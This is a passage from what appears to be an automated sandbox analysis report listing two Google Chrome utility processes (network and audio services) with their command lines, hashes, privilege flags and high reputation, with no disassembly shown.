                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8
                                                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                                      Start time:14:29:03
                                                                                                                                                                                                                                                                      Start date:21/08/2024
                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3268 --field-trial-handle=2008,i,3179526055083523585,4364293001320133249,262144 /prefetch:8
                                                                                                                                                                                                                                                                      Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                      No disassembly